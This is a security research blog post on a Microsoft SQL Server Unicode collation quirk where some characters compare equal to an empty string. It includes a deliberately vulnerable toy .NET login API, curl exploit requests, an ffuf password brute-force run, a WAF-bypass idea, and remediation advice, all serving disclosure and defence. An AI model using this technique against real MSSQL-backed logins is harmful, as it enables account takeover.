Tales From The Crypt: Microsoft Unicode Collation Oddities Leading to Software Vulnerabilities

Nov 29 2024

A goblin emoji and an empty string are the same thing, according to Microsoft SQL Server. The issue here is that almost every application language tends to disagree. This can lead to one of my favourite kinds of security issue ever – a whacky processing logic inconsistency between two systems leading to a vulnerability. The bickering-couple of AppSec. This is an article about one such condition, which causes a potential issue for any application using MSSQL as a back-end database. Let’s dive in!

Stephen Moir - Application Security Architect, Pulse Security client, and all-around champion - originally brought this issue to my attention. Stephen and Pulse have been working together for a while, and naturally when the email turned up in my inbox titled Nulls, whitespace and control characters I knew it was time to strap in for some cursed shenanigans. Stephen sent me through his proof-of-concepts to show the issue, we had a chat about a test-harness that could demonstrate the problem, and now here we are!

Check this out:

$ sudo docker exec -it 117e67d62e66 /opt/mssql-tools18/bin/sqlcmd -C -S localhost -U sa -P wehwahblorP2 -d DemoApiDb 
1> SELECT CASE WHEN N'👺' = N'' THEN 'Equal' ELSE 'Not Equal' END ;
2> go
     
-----
Equal

(1 rows affected)
1> 

According to MSSQL, a goblin emoji and an empty string are the same thing. Let’s discuss how this can end up in a vulnerability. The code included in this article is of my own creation, and is a simple test API to demonstrate the issue. Interestingly, this behaviour also happens:

1> SELECT CASE WHEN N'👺a👺b👺c' = N'abc' THEN 'Equal' ELSE 'Not Equal' END ;
2> go
     
-----
Equal

(1 rows affected)
1> 

The Bug and Exploitation

Right, so we know a goblin and nothing are the same thing according to MSSQL. If the application connecting to MSSQL correctly deduces that a goblin emoji is not an empty string, we now have an instance where the app and the database have differing collation logic which can sometimes result in a vulnerability.

Here’s the source code for a toy login API. I built this on dotnet core 8 using EntityFramework, snippet below – ignore the clear-text password, it’s not relevant for this demo. If you’re building real systems, you want password hashing, account management, brute-forcing prevention, MFA, and a bunch of things my silly toy code doesn’t do.

namespace apidemo
{
    public class User {
        public int Id { get; set; }
        public string username {get; set;} = ""; 
        public string email {get; set;} = ""; 
        public string? password {get; set;} 
        public bool IsActive {get; set;}
    }   

    public class UserDb: DbContext 
        {
                public UserDb(DbContextOptions<UserDb> options)
                    : base(options){}

                public DbSet<User> Users => Set<User>();
        }

    static class Program
    {
        static void Main(string[] args){
            var builder = WebApplication.CreateBuilder(args);
...yoink...
            app.MapPost("/login", async (UserDb db, [FromForm(Name = "username")] string? user,
                [FromForm(Name = "email")] string? email,
                [FromForm(Name = "password")] string? password) =>
            {
                if(String.IsNullOrWhiteSpace(password)){
                    return Results.BadRequest("Missing password");
                }
                if(!String.IsNullOrWhiteSpace(email)){
                    // login with email
                    var r = await db.Users.Where(u => u.email == email).Where(u => u.password == password).FirstOrDefaultAsync();
                    if(r != null){
                        return Results.Ok($"Logged in user ID {r.Id}");
                    }
                }

                if(!String.IsNullOrWhiteSpace(user)){
                    // login with username
                    var r = await db.Users.Where(u => u.username == user).Where(u => u.password == password).FirstOrDefaultAsync();
                    if(r != null){
                            return Results.Ok($"Logged in user ID {r.Id}");
                    }
                }

                return Results.Ok($"Login Failed");
            }).DisableAntiforgery();

This code lets users log in either via email address or via username. Provide a username and password? It’ll match that. Provide an email? It’ll use that to match your user record instead.

Let’s look at the database real quick, we have plenty of users without an email set:

1> SELECT count(Id) FROM USERS WHERE email = N'';
2> go
           
-----------
       1003 

(1 rows affected)
1> 

If we specify a login request with a goblin emoji as the email address we pass the empty string test:

                if(!String.IsNullOrWhiteSpace(email)){
                    // login with email
                    var r = await db.Users.Where(u => u.email == email).Where(u => u.password == password).FirstOrDefaultAsync();
                    if(r != null){
                        return Results.Ok($"Logged in user ID {r.Id}");
                    }
                }

Dotnet knows our goblin is not, in fact, an empty string but MSSQL begs to differ.

This means that if we specify a goblin emoji as an email address, MSSQL is checking every row with a blank email and trying the password for each in turn. We can brute-force the password for every user that has a blank email all at once, and vice versa with the username if we want. Thus, our vulnerability. Specify a goblin emoji or any other Unicode string that’ll trigger this condition and a password, and log in as any user that has that password set:

:~$ curl -i "http://localhost:5055/login" -X POST -d "email=💩&password=foo"
HTTP/1.1 200 OK
Content-Type: application/json; charset=utf-8
Date: Tue, 26 Nov 2024 02:56:43 GMT
Server: Kestrel
Transfer-Encoding: chunked

"Logged in user ID 9"

The above shows us that use ID 9 has the password foo. We didn’t even need to know the username for that user. This increases the efficacy of brute-force password guessing attack significantly, since we no longer need a valid username. As long as any user has that password set, it’ll log us in.

The following shows the ffuf tool (https://github.com/denandz/ffuf) being used to perform a brute-force attack, and finding valid passwords. I’m using my fork-of-ffuf here, since it includes audit logging that lets me parse fuzz run information and perform various statistical analysis trickery.

$ ./ffuf -w ~/xato-net-10-million-passwords-1000.txt -u "http://localhost:5055/login" -X POST -H "Content-Type: application/x-www-form-urlencoded" -d "username=👺&password=FUZZ" -mc all -fr "Login Failed" -audit-log=login-brute-1.json

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v2.2.0-doi
________________________________________________

 :: Method           : POST
 :: URL              : http://localhost:5055/login
 :: Wordlist         : FUZZ: /home/doi/xato-net-10-million-passwords-1000.txt
 :: Header           : Content-Type: [application/x-www-form-urlencoded]
 :: Data             : username=👺&password=FUZZ
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: all
 :: Filter           : Regexp: Login Failed
________________________________________________

123123                  [Status: 200, Size: 24, Words: 5, Lines: 1, Duration: 44ms]
monkey                  [Status: 200, Size: 24, Words: 5, Lines: 1, Duration: 44ms]
696969                  [Status: 200, Size: 24, Words: 5, Lines: 1, Duration: 44ms]
jordan                  [Status: 200, Size: 24, Words: 5, Lines: 1, Duration: 48ms]
zxcvbnm                 [Status: 200, Size: 24, Words: 5, Lines: 1, Duration: 49ms]
dragon                  [Status: 200, Size: 24, Words: 5, Lines: 1, Duration: 46ms]
...yoink...

Marvellous. This is essentially an analogue of a real-life vulnerability that came up. The core issue though, really, is MSSQL being weird about Unicode collation.

But… Why?

The real question is why does this bug happen. To summarise, the app server and the database server match strings different. Sometimes, these differences in processing logic can be exploited.

Dotnet  –   string.IsNullOrWhiteSpace(👺) - false
SQL     –   N'👺' == '' - true

We can dig further into the MSSQL server logic. There is also an API in the demo code that allows retrieval of users based on their username:

            // get a user by username
            app.MapGet("/user", async (UserDb db, [FromQuery(Name = "username")] string user) =>
            {
                var r = await db.Users.Where(u => u.username == user).ToListAsync();
                return r;
            });

Fuzzing this request to see if this issue can be triggered by any Unicode character, or only some Unicode characters.

First, we need a word list for this task. I generated a word list of all Unicode graphemes like so (note, this doesn’t include multi-char emoji and such, but does include out good friend – goblin) and URL encoded this data with pencode:

$ curl https://www.unicode.org/Public/UCD/latest/ucd/UnicodeData.txt | cut -f1 -d\; | while read codepoint; do echo -e "\U$codepoint"; done  > unicode-utf8.txt
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100 2124k  100 2124k    0     0   528k      0  0:00:04  0:00:04 --:--:--  529k
$ grep -a 👺 unicode-utf8.txt 
👺
$ pencode -input unicode-utf8.txt urlencode > unicode-utf8-urlencoded.txt 
$ tail -1 unicode-utf8-urlencoded.txt 
%F4%8F%BF%BD

Next, I figured out some basic responses size filtering for ffuf and ran the fuzz run. With the new audit logging feature this is just a nice-to-have to clean up the terminal output, the audit log JSON contains all the requests and responses that were sent regardless of filtering.

$ curl -i "http://localhost:5055/user?username=q" ; echo 
HTTP/1.1 200 OK
Content-Type: application/json; charset=utf-8
Date: Tue, 26 Nov 2024 03:14:56 GMT
Server: Kestrel
Transfer-Encoding: chunked

[]
$ ./ffuf -w unicode-utf8-urlencoded.txt -audit-log=unicode-fuzz-1.json -u "http://localhost:5055/user?username=FUZZ" -mc all -fs 2

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v2.2.0-doi
________________________________________________

 :: Method           : GET
 :: URL              : http://localhost:5055/user?username=FUZZ
 :: Wordlist         : FUZZ: /home/doi/go/src/github.com/denandz/ffuf/unicode-utf8-urlencoded.txt
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: all
 :: Filter           : Response size: 2
________________________________________________

                        [Status: 200, Size: 147, Words: 1, Lines: 1, Duration: 29ms]
                        [Status: 200, Size: 147, Words: 1, Lines: 1, Duration: 42ms]
%00                     [Status: 200, Size: 147, Words: 1, Lines: 1, Duration: 63ms]
                        [Status: 200, Size: 147, Words: 1, Lines: 1, Duration: 131ms]
+                       [Status: 200, Size: 147, Words: 1, Lines: 1, Duration: 149ms]
%C7%B9                  [Status: 200, Size: 147, Words: 1, Lines: 1, Duration: 7ms]
%C7%B7                  [Status: 200, Size: 147, Words: 1, Lines: 1, Duration: 7ms]
%C8%98                  [Status: 200, Size: 147, Words: 1, Lines: 1, Duration: 2ms]
%C8%9C                  [Status: 200, Size: 147, Words: 1, Lines: 1, Duration: 2ms]
...yoink...

Interestingly in a GET request, a null byte (%00 above) also triggers this issue. In a POST request, it’ll cause a 400 error when targeting dotnet, which is why we didn’t see this behaviour in earlier fuzz runs where we targeted a POST request versus the GET request above. I also notice here that a literal plus sign gets interpreted as a space, and thus matches. That’s something pencode should probably tag when performing URL encoding. I’ll dig into that the next time I have a spare moment…

Anyway, lets look at the response sizes to see if any Unicode grapheme will trigger this issue, or if we need something special. A response size of 147 happens when the issue in MSSQL is being triggered:

$ jq '. | select(.Type == "*ffuf.Response").Data.ContentLength' < unicode-fuzz-1.json | sort | uniq -c
  34305 147
   5812 2

We can see that 34305 test cases in this word list triggered the behaviour, and 5812 didn’t. So this isn’t a simple any-unicode-character-equals-empty-string issue and something more involved is going on. We can now carve out the triggering and non-triggering chars for further analysis. The ffuf audit log stores the payloads as base64. Let’s pull these out and decode them for analysis:

$ jq -r '. | select(.Data.ContentLength == 147) | .Data.Request.Input.FUZZ' < unicode-fuzz-1.json > triggers-base64-url.txt
$ jq -r '. | select(.Data.ContentLength == 2) | .Data.Request.Input.FUZZ' < unicode-fuzz-1.json > nontriggers-base64-url.txt
$ pencode -input triggers-base64-url.txt b64decode urldecode > triggers.txt
$ pencode -input nontriggers-base64-url.txt b64decode urldecode > nontriggers.txt

Then we can compare some of the test cases (shuf just selects a random entry for us to look at):

$ shuf -n1 triggers.txt  | xxd
00000000: e18f b20a                                ....
$ shuf -n1 triggers.txt  | xxd
00000000: f096 a988 0a                             .....
$ shuf -n1 triggers.txt  | xxd
00000000: f093 bea3 0a                             .....
$ shuf -n1 nontriggers.txt  | xxd
00000000: e287 8c0a                                ....
$ shuf -n1 nontriggers.txt  | xxd
00000000: efa8 910a                                ....
$ shuf -n1 nontriggers.txt  | xxd
00000000: e0af ab0a                 

As we see, this isn’t just an “any Unicode char” kind of problem. There are Unicode graphemes that both trigger the issue and do not trigger the issue. There’s more to the collation logic on Microsoft’s side, and this will require diving into a debugger and/or disassembly tool to figure out exactly what’s going on there.

Now if we want to go further down this rabbit hole, we have examples of characters that do and do not trigger the condition, which will make reversing engineering this easier.

The Plot Thickens

Is just MSSQL affected by this? Interestingly enough, no! Stephen pointed out this can get triggered from .NET land (on Windows targeting net481) using the following test code. Net481 behaves the same as MSSQL, dotnet core does not:

namespace consoleapp
{
    internal class Program
    {
        static void Main(string[] args)
        {
                if ("Ԥ".Equals("", StringComparison.CurrentCulture))
                {
                    Console.WriteLine("1. Works the same as SQL");
                }
                else {
                    Console.WriteLine("1. Works differently");
                }


                if ("Ԥ".Equals("", StringComparison.InvariantCulture))
                {
                    Console.WriteLine("2. Works the same as SQL");
                }
                else {
                    Console.WriteLine("2. Works differently");
                }

                if ("Ԥ".Equals(""))
                {
                    Console.WriteLine("3. Works the same as SQL");
                }
                else {
                    Console.WriteLine("3. Works differently");
                }
        }
    } 
}

And executing:

C:\Users\DoI\Documents\console>dotnet run
1. Works the same as SQL
2. Works the same as SQL
3. Works differently

However, when I run the test code on my Linux virtual machine with dotnet core (or target dotnet core 9 on Windows):

:~/src/consoleapp$ dotnet run
1. Works differently
2. Works differently
3. Works differently

We don’t see the issue! There is something going on inside the Windows world where this collation bug is introduced. Since the bug does rear its ugly head on MSSQL on Linux too, I would bet that the Unicode processing logic has been copied-and-pasted by Microsoft devs from the Windows libraries into the MSSQL project. This is purely conjecture on my part, of course.

Further Considerations

Interestingly, this behaviour also happens:

1> SELECT CASE WHEN N'👺a👺b👺c' = N'abc' THEN 'Equal' ELSE 'Not Equal' END ;
2> go
     
-----
Equal

(1 rows affected)
1> 

The goblins in between characters get ignored. This likely opens up other opportunities for exploiting the discrepancy in processing. One idea that comes to mind is using a WAF or other deny-list as a mechanism to stop some form of attack – maybe a hard-coded user with a known password in some third-party software - which could be bypassed by throwing a few goblins into the string.

Discovery and Remediation

These sorts of processing inconsistency vulnerabilities can be challenging to find, given that they exist due to the interactions and discrepancies between two systems. In this case, the application string handing and the MSSQL database string handling.

I used dotnet as an example here, but this same vulnerability could rear its head with any application that uses MSSQL as a back-end database. Here’s some guidance on how to find the issue and how to think about fixing the issue:

Detection

You’ll notice that I wrote no SQL queries in the example. I used a well known framework (Entity Framework) and let it do it all for me. Meaning, discovering this issue via only source code analysis could be challenging. Here are my recommendations for folks hunting:

  • Establish whether your target is backed by MSSQL, if so consider the Unicode collation processing inconsistency pattern.
  • Search for instances of strings being checked as null or empty in the application code or binaries you’re reversing. These make good fuzzing targets.
  • Log SQL queries on the database side and map these to attacker-controlled parameters, searching for instances where string comparison is happening and the column includes empty strings in the dataset.
  • Ensure you’re using a robust web-application input fuzzing process to look for outliers. This means rolling Unicode strings into your fuzzing word lists. Note: this issue can be challenging to catch via fuzzing in some instances, depending on the response data and timing discrepancies. Combine this with reviewing logging and binary/source analysis.

Remember, you’re not limited to just manual testing techniques or source-code review or binary analysis – you can use all of these in different scenarios against the same target to understand what’s going on.

Remediation

Remediating these issues will come down to vigilance around checking for empty strings and understanding that Unicode graphemes can cause these collation problems.

Whether or not this processing inconsistency presents a security vulnerability in any given instance isn’t straight forward, though, and would likely need case-by-case analysis. I’m going to quote Stephen directly here:

How much of a problem this behaviour will cause will depend on the application […] it could be a big problem. Or it might not be a problem at all.

An additional AND statement in an SQL query could resolve this, effectively append AND @COLUMN <> “”.

In the case of my test API though, I’m using EntityFramework and don’t really have easy control of the underlying SQL queries used by the framework. This attack isn’t easy to defend against with input validation, so any kind of filter or change in logic would need to go through a robust test suite to ensure it’s addressed the vulnerability. I’d start with implementing an allow-list of permissible characters and patterns – which should be reasonably easy for email at least – and then performing further fuzz test to catch any edge cases.

Again, this issue doesn’t just effect dotnet applications – any app in any language that’s using MSSQL as a back-end may very well be vulnerable to similar issues.

How much of an issue this is will depend on the practical impact of the resulting vulnerability, if any. As with most things in cyber security, the nuance is key and should guide the recommendations.

Summary

Writing this article and digging into this issue was super fun. I especially love that this is something one of our clients came to us with and we got to fall down this rabbit hole together. As a result, both our understandings of these systems got stronger and we now have a wonderful cursed edge-case.

I look forward to the next rabbit hole we get to fall down together, and big thanks to the Stephen Moir for looping me in on this adventure.

Bonus Round - Limitations of “Black Box” Penetration Testing

In this article we looked at a vulnerability that occurred due to processing inconsistencies between an application and the MSSQL database. The developer in this case arguably made no mistakes. The vulnerability wasn’t detected by automated scanners or static code analysis. This issue may have been found by manually guided web-application fuzzing, as detailed in the Bug and Exploitation section. Even then without access to dig into logs and back-end systems to perform proper security research and bug hunting, would a pentester ever be able to explain why it happened?

I think this nicely shows the limitations of traditional “black-box” penetration testing. Understanding a system means a security tester can find better, more in depth vulnerabilities, and better explain how to fix them. Even the OWASP Application Security Verification Standard has this to say about it:

Level 1 is the only level that is completely penetration testable using humans. All others require access to documentation, source code, configuration, and the people involved in the development process. However, even if L1 allows “black box” (no documentation and no source) testing to occur, it is not an effective assurance activity and should be actively discouraged. - https://github.com/OWASP/ASVS/blob/master/4.0/en/0x03-Using-ASVS.md#application-security-verification-levels

So, if you’re a penetration tester, think about incorporating research, reverse engineering and/or source-code analysis in your day-to-day and asking why certain behaviour is happening.

If you’re someone looking at getting some testing performed, hopefully this section has helped provide a practical example of why security consultants and testers are asking for things that would seem a little strange when compared to how we tested systems ten years ago.

I think that if we (IT professionals) want to see things progressively get more secure, we must embrace collaboration and go beyond the generic findings and boiler-plate recommendations of the past.

Test API Setup

Setting up some toy code to replicate functionality and understand logic better is a supremely powerful technique when hunting for vulnerabilities. Given that I’m no doubt going to have to spin up EntityFramework, a local DB and some doofus API again in the near future, I’m including my test lab setup steps. Hopefully this will help you, reader, as well as future-me.

The source-code for my toy API has been included at the end of this section. I ran this on a Debian Linux VM. I ran the database like this:

sudo docker run --rm -e "ACCEPT_EULA=Y" -e "MSSQL_SA_PASSWORD=..." -p 1433:1433 -d mcr.microsoft.com/mssql/server:2022-latest

Configured the dotnet app like so:

:~/src/apidemo-csharp$ cat appsettings.Development.json 
{
  "Logging": {
	"LogLevel": {
	  "Default": "Debug",
	  "System": "Information",
	  "Microsoft": "Information"
	}
  },
  "ConnectionStrings" : {
	"DefaultDatabase": "Server=localhost;Database=DemoApiDb;User Id=sa;Password=...;TrustServerCertificate=true"
  }
}

You’ll need the following packages:

dotnet add package Microsoft.AspNetCore.Diagnostics.EntityFrameworkCore –prerelease
dotnet add package Microsoft.EntityFrameworkCore.SqlServer

After copying the toy code to Program.cs, you can use the following to get the DB set up:

dotnet tool install -g dotnet-ef
~/.dotnet/tools/dotnet-ef migrations add InitialCreate -v
~/.dotnet/tools/dotnet-ef database update -v

And finally issue dotnet run and have fun. You’ll need to create some users by POSTing data to /users. EG:

curl -X POST -H "Content-Type: application/json" http://localhost:5055/users -d '{"isActive":true, "password":"foo", "username":"blah"}'; echo

Program.cs

// THIS IS TOY CODE TO TEST EF<->MSSQL UNICODE PROCESSING LOGIC
// DO NOT USE AS A REFERENCE FOR REAL CODE
using Microsoft.EntityFrameworkCore;
using Microsoft.AspNetCore.Mvc;

namespace apidemo
{
	public class User {
		public int Id { get; set; }
		public string username {get; set;} = "";
		public string email {get; set;} = "";
		public string? password {get; set;} 
		public bool IsActive {get; set;}
	}

	public class UserDb: DbContext 
		{
				public UserDb(DbContextOptions<UserDb> options)
					: base(options){}

				public DbSet<User> Users => Set<User>();
		}

	static class Program
	{
		static void Main(string[] args){
			var builder = WebApplication.CreateBuilder(args);
			builder.Services.AddDbContext<UserDb>(opt => {
							opt.UseSqlServer(builder.Configuration.GetConnectionString("DefaultDatabase"));
					});
			var app = builder.Build();

			app.MapGet("/", () => "Demlo");

			// login a user
			app.MapPost("/login", async (UserDb db, [FromForm(Name = "username")] string? user,
				[FromForm(Name = "email")] string? email,
				[FromForm(Name = "password")] string? password) =>
			{
				if(String.IsNullOrWhiteSpace(password)){
					return Results.BadRequest("Missing password");
				}
				if(!String.IsNullOrWhiteSpace(email)){
					// login with email
					var r = await db.Users.Where(u => u.email == email).Where(u => u.password == password).FirstOrDefaultAsync();
					if(r != null){
						return Results.Ok($"Logged in user ID {r.Id}");
					}
				}

				if(!String.IsNullOrWhiteSpace(user)){
					// login with username
					var r = await db.Users.Where(u => u.username == user).Where(u => u.password == password).FirstOrDefaultAsync();
					if(r != null){
							return Results.Ok($"Logged in user ID {r.Id}");
					}
				}

				return Results.Ok($"Login Failed");
			}).DisableAntiforgery();

			// get a user by username
			app.MapGet("/user", async (UserDb db, [FromQuery(Name = "username")] string user) =>
			{
				var r = await db.Users.Where(u => u.username == user).ToListAsync();
				return r;
			});

			// list all users
			app.MapGet("/users", async (UserDb db) => await db.Users.ToListAsync());

			// add a user
			app.MapPost("/users", async (User user, UserDb db) =>
			{
				db.Users.Add(user);
				await db.SaveChangesAsync();

				return Results.Created($"/users/{user.Id}", user);
			});
			app.Run();
		}
	}
}


Follow us on LinkedIn